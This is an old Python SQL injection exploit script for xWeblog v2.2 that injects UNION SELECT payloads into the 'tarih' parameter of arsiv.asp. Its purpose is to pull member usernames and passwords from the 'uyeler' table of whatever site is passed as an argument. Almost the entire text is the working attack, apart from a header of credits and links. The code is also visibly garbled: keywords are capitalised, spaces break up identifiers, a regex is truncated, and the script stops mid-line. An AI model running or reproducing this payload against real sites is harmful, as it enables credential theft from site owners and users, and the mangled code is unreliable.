#! /Usr/bin/env python
#-*-Coding: UTF-8 -*-
# Title: xWeblog v2.2 (arsiv. asp tarih) SQL Injection Exploit (. py)
# Proof: http://img408.imageshack.us/img408/7624/sqlm.jpg
# Script Down.: http://www.aspdunyasi.com/goster.asp? Id = 19
# Tested: Windows XP Professional sp3
# Author: ZoRLu/http://inj3ct0r.com/author/577
# Mail-msn: admin@yildirimordulari.com
# Home: http://z0rlu.blogspot.com
# Thanks: http://inj3ct0r.com/http://www.exploit-db.com/http://packetstormsecurity.org/http://shell-storm.org
# Date: 08/10/2010
# Tesekkur: r0073r, Dr. Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE other bl! N
# Lakirdi: Gecmiyorum Zaman a. k :/
# Lakirdi: off ulan off/html "> http://www.videokeyfim.net/duruyenin-gugumleri-keklik-gibi-kanadimi-suzmedim-murat-ali-doya-doya-gezmedim-bu-kara-yaziyi-kendim-yazmadim.html
Import sys, urllib2, re, OS, time
If len (sys. argv) <2:
OS. system ([clear, cls] [1])
OS. system (color 2)
Print "_______________________________________________________________"
Print ""
Print "xWeblog v2.2 (arsiv. asp tarih) SQL Inj Exploit (. py )"
Print ""
Print "Coded by ZoRLu"
Print ""
Print "Usage :"
Print ""
Print "python exploit. py http://site.com/path"
Print ""
Print "_______________________________________________________________"
Sys. exit (1)
Add = "http ://"
Add2 = "/"
Sitemiz = sys. argv [1]
If sitemiz [-1:]! = Add2:
Print "where is it:" + add2
Print "okk I will add"
Time. sleep (2)
Sitemiz + = add2
Print "its OK" + "" + sitemiz
If sitemiz [: 7]! = Add:
Print "where is it:" + add
Print "okk I will add"
Time. sleep (2)
Sitemiz = add + sitemiz
Print "its OK" + "" + sitemiz
Vulnfile = "arsiv. asp"
Ad = "? Tarih = 0000 + union + select + 1, AD, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 + from + uyeler"
Url = sitemiz + vulnfile + ad
Vulnfile = "arsiv. asp"
Sifre = "? Tarih = 0000 + union + select + 1, SIFRE, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 + from + uyeler"
Url2 = sitemiz + vulnfile + sifre
Print "Exploiting ..."
Print "wait three sec .! "
Time. sleep (3)
Try:
Veri = urllib2.urlopen (url). read ()
Aliver = re. findall (r "
If len (aliver)> 0:
Print "AD:" + aliver [0] [0] + aliver [0] [1] + aliver [0] [2]
Time. sleep (2)
Else:
Print "Exploit failed ..."
Sys. exit (1)
Failed t urllib2.HTTPError:
Print "Forbidden